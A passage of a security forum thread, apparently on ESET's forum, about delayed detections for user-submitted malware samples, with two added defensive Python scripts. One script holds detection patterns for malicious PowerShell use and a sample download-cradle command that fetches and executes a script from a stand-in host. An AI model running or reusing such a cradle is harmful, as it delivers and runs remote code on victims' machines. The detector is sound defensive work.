Some samples submitted but not processed


16 hours ago, SeriousHoax said:

I can only say what I experience myself. Talking about malware submission experience, I sent this sample to ESET more than 2 weeks ago, on 12 August, but I have neither heard back nor has a signature been created yet. LiveGuard gave it a safe verdict, but it's not safe.

If possible, please improve the processing of samples submitted by users.

VT link of the sample: VirusTotal - File - d468b56da07173c69423973b706924187e134d0baea07e2ef8e7b49afcd5aacd

ESET has added a detection "A Variant Of Generik.NGIZHAK" for it. Too late. Also I don't think this Generik detection is able to cover future variants of this malware.

Edited by AnthonyQ

12 hours ago, AnthonyQ said:

ESET has added a detection "A Variant Of Generik.NGIZHAK" for it. Too late. Also I don't think this Generik detection is able to cover future variants of this malware.

Microsoft has a sig. for it that's two years old: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/Tnega!MSR&ThreatID=2147762521


  • Administrators
1 hour ago, itman said:

To put it right, the detection name tells nothing about when a detection was added. I've scanned the sample in question with Defender updated about 2 months ago and it wasn't detected:


13 hours ago, AnthonyQ said:

I assume LiveGuard gave a safe verdict on these? Both samples employ VM/sandbox detection and evasion tactics such as sleeping and dummy code loop execution.

Sample 1 exploits CVE-2015-3005:

Quote

Cross-site scripting (XSS) vulnerability in the Dynamic VPN in Juniper Junos 12.1X44 before 12.1X44-D45, 12.1X46 before 12.1X46-D30, 12.1X47 before 12.1X47-D20, and 12.3X48 before 12.3X48-D10 on SRX series devices allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

Sample 2 exploits CVE-2015-3008:

Quote

Asterisk Open Source 1.8 before 1.8.32.3, 11.x before 11.17.1, 12.x before 12.8.2, and 13.x before 13.3.2 and Certified Asterisk 1.8.28 before 1.8.28-cert5, 11.6 before 11.6-cert11, and 13.1 before 13.1-cert2, when registering a SIP TLS device, does not properly handle a null byte in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority.

I would say these are targeted attacks with a low frequency occurrence. Also exploits are N/A unless the vulnerability exists on the device.

Edited by itman

Looks like LiveGuard script detection has improved.

I found a .vbs sample that currently only Kaspersky and Symantec detect at VT: https://www.virustotal.com/gui/file/b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac/detection . What was interesting about this was the LiveGuard detection popup just stated the file was malicious and deleted. Further confirmed by the Detection log entry created:

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
9/2/2022 4:44:52 PM;ESET LiveGuard;file;C:\Users\xxxxxx\Downloads\b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac.vbs;ESET LiveGuard;deleted;;;A97862BCD4EFCAC0F0379BBC5160B803AD89AAFA;9/2/2022 4:43:19 PM

-EDIT- 9/3

Eset now has a sig. for this malware, A Variant Of Generik.HHTKOJH. Also, as of this morning only 14 vendors at VT detect it. Avast/AVG, Microsoft, etc. do not detect it.

Edited by itman
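The exported Detection log quoted above is semicolon-separated with a header row, so it is easy to post-process. As an added example (not ESET's tooling, and not code from anyone in this thread), the script below parses that export, pulls out the LiveGuard verdicts, measures the gap between "First seen here" and the verdict timestamp, recovers the SHA-256 from files that were saved under their VT hash, and builds a VT search URL from the logged SHA-1. The first record is the one from the post; the second record, the bytes hashed in the local-copy check, and the VT search-URL shape are constructed assumptions.

```python
"""Triage an ESET detection-log export.

Added example, not ESET's own tooling.  The first record is the LiveGuard
line quoted in the post above; the second record (a made-up Generik hit
with an all-zero hash) is constructed so the filters have something to
separate.  The VirusTotal search-URL shape is an assumption."""
import csv
import hashlib
import io
import re
from dataclasses import dataclass
from datetime import datetime

ESET_LOG = r"""Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
9/2/2022 4:44:52 PM;ESET LiveGuard;file;C:\Users\xxxxxx\Downloads\b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac.vbs;ESET LiveGuard;deleted;;;A97862BCD4EFCAC0F0379BBC5160B803AD89AAFA;9/2/2022 4:43:19 PM
9/3/2022 9:10:00 AM;Real-time file system protection;file;C:\Users\xxxxxx\Downloads\setup.exe;a variant of Generik.HHTKOJH;cleaned by deleting;;;0000000000000000000000000000000000000000;9/3/2022 9:09:58 AM
"""

TIME_FMT = "%m/%d/%Y %I:%M:%S %p"          # the export uses a 12-hour clock
SHA1_RE = re.compile(r"^[0-9a-f]{40}$")
SHA256_NAME_RE = re.compile(r"([0-9a-fA-F]{64})\.[A-Za-z0-9]+$")


@dataclass(frozen=True)
class DetectionEvent:
    time: datetime
    scanner: str
    object_type: str
    path: str
    detection: str
    action: str
    sha1: str          # normalised to lower-case hex
    first_seen: datetime

    @property
    def seconds_to_verdict(self) -> int:
        """Gap between 'First seen here' and the verdict timestamp."""
        return int((self.time - self.first_seen).total_seconds())

    @property
    def sha256_from_name(self):
        """SHA-256 recovered from the file name when a sample was saved
        under its VT hash (as in the post); None otherwise."""
        m = SHA256_NAME_RE.search(self.path.rsplit("\\", 1)[-1])
        return m.group(1).lower() if m else None


def parse_eset_log(text: str) -> list:
    """Parse the semicolon-separated export; rejects malformed hash fields."""
    events = []
    for row in csv.DictReader(io.StringIO(text), delimiter=";"):
        sha1 = row["Hash"].strip().lower()
        if not SHA1_RE.match(sha1):
            raise ValueError(f"unexpected hash field: {row['Hash']!r}")
        events.append(DetectionEvent(
            time=datetime.strptime(row["Time"].strip(), TIME_FMT),
            scanner=row["Scanner"],
            object_type=row["Object type"],
            path=row["Object"],
            detection=row["Detection"],
            action=row["Action"],
            sha1=sha1,
            first_seen=datetime.strptime(row["First seen here"].strip(), TIME_FMT),
        ))
    return events


def liveguard_events(events):
    """Only the verdicts that came back from the LiveGuard cloud sandbox."""
    return [e for e in events if e.scanner == "ESET LiveGuard"]


def vt_search_url(file_hash: str) -> str:
    """VT search accepts MD5, SHA-1 or SHA-256 (URL shape assumed)."""
    return f"https://www.virustotal.com/gui/search/{file_hash.lower()}"


def matches_logged_hash(data: bytes, event: DetectionEvent) -> bool:
    """Check a local copy of a sample against the SHA-1 ESET logged for it."""
    return hashlib.sha1(data).hexdigest() == event.sha1


if __name__ == "__main__":
    for e in liveguard_events(parse_eset_log(ESET_LOG)):
        print(f"{e.path}\n  verdict after {e.seconds_to_verdict}s: {e.action}"
              f"\n  VT: {vt_search_url(e.sha1)}")
```

For the LiveGuard record in the post the verdict came back 93 seconds after the file was first seen, which is the "approx. 2 mins" turnaround discussed later in the thread; the SHA-1 in the log is the one used for the VT hash search suggested further down.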

As far as LiveGuard detection capability of .exe's, nothing has changed.

I found a recent malicious Russian-based cracked version of anydesk.exe. Only two vendors at VT detect it, w/Rising being one of them: https://www.virustotal.com/gui/file/1a1649dead5505b7a692b868d15ebcf964497e284461d927513e7b8cc7f7fb0c/detection . Also of note is Joe's Cloud Sandbox found it malicious, but only with a 55/100 confidence factor: https://www.joesandbox.com/analysis/697110/0/html .

LiveGuard immediately sent this one to Eset Virus Lab, but gave it a safe verdict. Also the verdict was returned in approx. 2 mins, indicating to me no in-depth analysis was done. I swear that LiveGuard is no better than what exists in EIS with LiveGrid only pertaining to .exe's. All that occurs in the LiveGuard cloud is a cursory scan which really isn't much better than what local heuristic scanning provides.

Edited by itman

7 hours ago, itman said:

As far as LiveGuard detection capability of .exe's, nothing has changed.

I found a recent malicious Russian-based cracked version of anydesk.exe. Only two vendors at VT detect it, w/Rising being one of them: https://www.virustotal.com/gui/file/1a1649dead5505b7a692b868d15ebcf964497e284461d927513e7b8cc7f7fb0c/detection . Also of note is Joe's Cloud Sandbox found it malicious, but only with a 55/100 confidence factor: https://www.joesandbox.com/analysis/697110/0/html .

LiveGuard immediately sent this one to Eset Virus Lab, but gave it a safe verdict. Also the verdict was returned in approx. 2 mins, indicating to me no in-depth analysis was done. I swear that LiveGuard is no better than what exists in EIS as far as LiveGrid pertaining to .exe's. All that occurs in the LiveGuard cloud is a cursory scan which really isn't much better than what local heuristic scanning provides.

From my experience, I feel that most threats detected by LiveGuard can also be detected by other ESET’s post-execution detection technologies, such as Advanced Memory Scanner, HTTP filter, ransomware shield, and so on. 

Edited by AnthonyQ

18 hours ago, itman said:

malicious Russian based cracked version of anydesk.exe

BitDefender, Emsisoft, and FireEye now detecting this.

Tip to Eset - look for Costura Assembly Loader presence.


  • Most Valued Members
On 9/2/2022 at 11:59 PM, itman said:

Looks like LiveGuard script detection has improved.

I found a .vbs sample that currently only Kaspersky and Symantec detect at VT: https://www.virustotal.com/gui/file/b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac/detection . What was interesting about this was the LiveGuard detection popup just stated the file was malicious and deleted. Further confirmed by the Detection log entry created:

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
9/2/2022 4:44:52 PM;ESET LiveGuard;file;C:\Users\xxxxxx\Downloads\b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac.vbs;ESET LiveGuard;deleted;;;A97862BCD4EFCAC0F0379BBC5160B803AD89AAFA;9/2/2022 4:43:19 PM

-EDIT- 9/3

Eset now has a sig. for this malware, A Variant Of Generik.HHTKOJH. Also, as of this morning only 14 vendors at VT detect it. Avast/AVG, Microsoft, etc. do not detect it.

Weird, your link triggers ESET Endpoint Linux.


Edited by Nightowl

8 hours ago, Nightowl said:

Weird , your link triggers ESET Endpoint Linux

That is very weird since link is OK using Win 10 and Firefox:

Also strange is that Eset Linux indicates PowerShell based malware? I assume you installed PowerShell on your Linux build: https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-linux?view=powershell-7.2 ?

I also believe I know what might have caused this. Someone in the VT web page Comments section posted a URL where this malware could be downloaded from. The comment has been removed. Guess Eset Linux triggered on that URL. Try to access the link again.

Edited by itman

  • Most Valued Members
16 hours ago, itman said:

That is very weird since link is OK using Win 10 and Firefox:

Also strange is that Eset Linux indicates PowerShell based malware? I assume you installed PowerShell on your Linux build: https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-linux?view=powershell-7.2 ?

I also believe I know what might have caused this. Someone in the VT web page Comments section posted a URL where this malware could be downloaded from. The comment has been removed. Guess Eset Linux triggered on that URL. Try to access the link again.

No I didn't install Powershell and the detection is still triggered when that page is visited.


12 hours ago, Nightowl said:

No I didn't install Powershell and the detection is still triggered when that page is visited.

Try this link: https://www.virustotal.com/gui/file/b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac , instead. Note that the only difference is "/detection" is not appended to the URL.

Regardless, Eset Linux should not be detecting anything on the link I originally posted. If Eset Linux detects on the above link I just posted, I would say you are being browser redirected to a malicious web site.

Edited by itman

  • Most Valued Members
16 hours ago, itman said:

Try this link: https://www.virustotal.com/gui/file/b875722c0e57a6a03109c144f31e18f4788ac61407569f54e560c3507321aeac , instead. Note that the only difference is "/detection" is not appended to the URL.

Regardless, Eset Linux should not be detecting anything on the link I originally posted. If Eset Linux detects on the above link I just posted, I would say you are being browser redirected to a malicious web site.

Still the same, my brother, and I don't think I am being redirected anywhere. I don't have JS at all with Firefox and uBlock Origin, I am protected by a good firewall, and this PC is safe.


7 hours ago, Nightowl said:

Still the same, my brother, and I don't think I am being redirected anywhere. I don't have JS at all with Firefox and uBlock Origin, I am protected by a good firewall, and this PC is safe.

The last thing you can try is to go to the VT home page using this URL: https://www.virustotal.com . Prior to doing this, clear your Firefox startup cache via the Troubleshooting option.

Now do a hash search using this SHA1 hash, a97862bcd4efcac0f0379bbc5160b803ad89aafa , of the malware. What should be displayed is the VT web page corresponding to URL I posted yesterday.

If Eset Linux performs the same malware detection behavior, something is screwed up with it.

Edited by itman

I've submitted the following potential Rootkit samples to ESET Labs via Email more than ten days ago, but I have not received any replies and no detection was added. 

https://www.virustotal.com/gui/file/eaad75470e21084ab3a38f6cb0f3aa72d4203260515619f8703e3fc80e800d7a

https://www.virustotal.com/gui/file/b83915f38f022aaf9b540f80514fbbc19febf76538788a2f5e351d4e65c1b417

https://www.virustotal.com/gui/file/8bef06598b67c1edbbf42399a19c8a8aa61d12466e873d70e9e26a10ba54d308

Does that mean ESET found the above samples were not malicious and detection was not necessary?


13 hours ago, AnthonyQ said:

I've submitted the following potential Rootkit samples to ESET Labs via Email more than ten days ago, but I have not received any replies and no detection was added. 

https://www.virustotal.com/gui/file/eaad75470e21084ab3a38f6cb0f3aa72d4203260515619f8703e3fc80e800d7a

https://www.virustotal.com/gui/file/b83915f38f022aaf9b540f80514fbbc19febf76538788a2f5e351d4e65c1b417

https://www.virustotal.com/gui/file/8bef06598b67c1edbbf42399a19c8a8aa61d12466e873d70e9e26a10ba54d308

Does that mean ESET found the above samples were not malicious and detection was not necessary?

These are all valid Win 10/11 attestation-signed drivers. I wrote a forum posting a while back about the potential dangers of those here: https://forum.eset.com/topic/32841-a-clear-and-present-danger-lurking-in-windows-1011/#comment-153631 . Looks like that posting "fell on deaf Eset ears."

My recommendation was and still is that Eset optionally warn about attempted attestation-signed driver installation. Legit commercially purchased software does not use attestation-signed drivers.

-EDIT- I guess I should update my previous forum posting to note that attestation signed drivers also work on Windows Server 2016/2019. Of note:

Quote

NOTE: it is not required to pass the HLK tests just to get a driver that loads on Windows Server 2016/2019. An attestation-signed driver is good enough. This claim contradicts the "official" Microsoft documentation but trust me, it is true. Our installers have attestation-signed drivers and no Windows Server 2016/2019 users have complained. Apparently that particular piece of MS documentation was written at a time when MS was _planning_ to require WHQL-certified drivers for Windows Server 2016+, then backpedaled and forgot to update the documentation.

https://community.openvpn.net/openvpn/wiki/HLKTesting

A good example of the question, "Should you really trust VPN software?"

Edited by itman

@AnthonyQ, posting Eset undetected malware samples in the forum appears to be "an effort in futility." Eset still doesn't detect the rootkit driver samples you posted here: https://forum.eset.com/topic/33462-some-samples-submitted-but-not-processed/?do=findComment&comment=156039 .


5 hours ago, itman said:

@AnthonyQ, posting Eset undetected malware samples in the forum appears to be "an effort in futility." Eset still doesn't detect the rootkit driver samples you posted here: https://forum.eset.com/topic/33462-some-samples-submitted-but-not-processed/?do=findComment&comment=156039 .

Just checked, these Rootkit samples are finally detected as Win64/Rootkit.Agent.BQ.


13 hours ago, AnthonyQ said:

Just checked, these Rootkit samples are finally detected as Win64/Rootkit.Agent.BQ.

So it took Eset almost 3 weeks to determine these drivers were malicious ..........🙄

BTW - these driver samples should be reported to Microsoft which still doesn't detect them so that their code signing certificates are revoked.

Edited by itman

  • Most Valued Members
2 hours ago, itman said:

So it took Eset almost 3 weeks to determine these drivers were malicious ..........🙄

BTW - these driver samples should be reported to Microsoft which still doesn't detect them so that their code signing certificates are revoked.

I'd be curious to hear from Eset why it took 3 weeks.

I understand they will need to do some testing, but I presume some is automated. I presume they also get a lot of submissions. But the issue I have is that in those 3 weeks many people may have been infected, which will be alarming to those people if they hear it was submitted a while ago and yet has only just been added as a signature.


2 hours ago, peteyt said:

I understand they will need to do some testing but presume some is automated.

The problem is these rootkit driver samples were submitted to VT without any related software use. Unless the loaded driver is specifically used by one or more Win OS components, the loaded driver does nothing. This is confirmed by the cloud sandboxes that originally examined the drivers; none found them malicious.

Assumed is the security solutions that originally detected these drivers at VT did so via generic signature heuristic scanning detection.

Since CrowdStrike Falcon detected the first driver sample as malicious at VT, I regenerated a new scan report at the Hybrid-Analysis web site: https://www.hybrid-analysis.com/sample/eaad75470e21084ab3a38f6cb0f3aa72d4203260515619f8703e3fc80e800d7a/6327815d896b877bb501614e . Besides factoring in existing VT AV detections, the other element in the malicious rating was a MITRE factor as to ntoskrnl.exe access. Again, it appears the driver code was examined versus any driver behavior activities.

Edited by itman

On 9/23/2022 at 1:06 PM, AnthonyQ said:

A stealer sample that was submitted via email almost 2 days ago is still not detected by ESET: https://www.virustotal.com/gui/file/609cccf310e725ba4ff4d74edffa0c33d4640f3c391dbbac4e1d00dd3f9c249e

When I checked VT yesterday, Eset now detects it.

BTW - this is an example of why I also use OSArmor. Referring to VT detection sandbox behavior, it would have blocked it via unusual command script characteristics and/or the attempt to modify the existing PowerShell execution policy.

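As an added example of the kind of pre-execution check referred to in the post above (not OSArmor's or ESET's code, and not from anyone in this thread), the script below runs a small rule set over process command lines: execution-policy overrides, the Set-ExecutionPolicy cmdlet, hidden windows, download cradles, script hosts launched on files in user-writable folders, and -EncodedCommand blobs, which it decodes and re-scans so that base64 encoding does not hide a policy change from the rules. The rule set and all four sample command lines are constructed for the demo; nothing here is taken from the actual samples in the thread.

```python
"""Pre-execution command-line heuristics of the kind a behaviour blocker
such as OSArmor applies, independent of any AV signature.

Added example, not OSArmor's or ESET's code.  The rule set and the
sample command lines are constructed for the demo; the only detail taken
from the thread is the idea of flagging execution-policy tampering."""
import base64
import re

# '-EncodedCommand', '-enc', '-ec' or '-e' followed by a base64 blob
ENCODED_RE = re.compile(r"(?i)-e(?:nc\w*|c)?\s+([A-Za-z0-9+/=]{16,})")

RULES = {
    # -ExecutionPolicy / -ep / -exec followed by Bypass or Unrestricted
    "execution-policy-override": re.compile(
        r"(?i)-e(?:p|x\w*)\s+(?:bypass|unrestricted)"),
    # persistent policy change rather than a per-process override
    "set-executionpolicy-cmdlet": re.compile(r"(?i)\bSet-ExecutionPolicy\b"),
    "hidden-window": re.compile(r"(?i)-w\w*\s+hidden"),
    "encoded-command": ENCODED_RE,
    "download-cradle": re.compile(
        r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"
        r"|Net\.WebClient|Invoke-Expression|\biex\b"),
    # script host launched on a script sitting in a user-writable folder
    "script-host-from-user-dir": re.compile(
        r"(?i)\b(?:wscript|cscript|mshta)(?:\.exe)?\b.*"
        r"\\(?:Downloads|Temp|AppData)\\.*\.(?:vbs|vbe|js|jse|hta|wsf)\b"),
}


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand blob (UTF-16LE base64),
    or None if the command line has no valid one."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> list:
    """Names of the rules that fire, scanning the decoded payload too so
    that encoding does not hide a Set-ExecutionPolicy from the rules."""
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits |= {f"decoded:{name}" for name, rx in RULES.items()
                 if rx.search(decoded)}
    return sorted(hits)


def should_block(cmdline: str) -> bool:
    return bool(analyze(cmdline))


# Constructed samples (none taken from the thread's actual malware).
_ENCODED = base64.b64encode(
    "Set-ExecutionPolicy Unrestricted -Scope CurrentUser".encode("utf-16-le")
).decode()
SAMPLES = {
    "cradle": "powershell.exe -NoP -W Hidden -Ep Bypass -c "
              "\"IEX (New-Object Net.WebClient).DownloadString("
              "'http://example.invalid/a.ps1')\"",
    "encoded": f"powershell.exe -NonInteractive -EncodedCommand {_ENCODED}",
    "vbs": r'wscript.exe "C:\Users\xxxxxx\Downloads\invoice.vbs"',
    "benign": r"powershell.exe -NoProfile -File C:\Program Files\Vendor\maintenance.ps1",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(f"{label:8} block={should_block(cmd)!s:5} {analyze(cmd)}")
```

These rules fire on what the command line does rather than on a file hash, which is why a behaviour blocker can stop a sample days before any vendor ships a signature for it. The cost is false positives: administrators' own deployment scripts routinely run with -ExecutionPolicy Bypass, so in practice a rule set like this needs allow-listing by signer or path in front of it.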
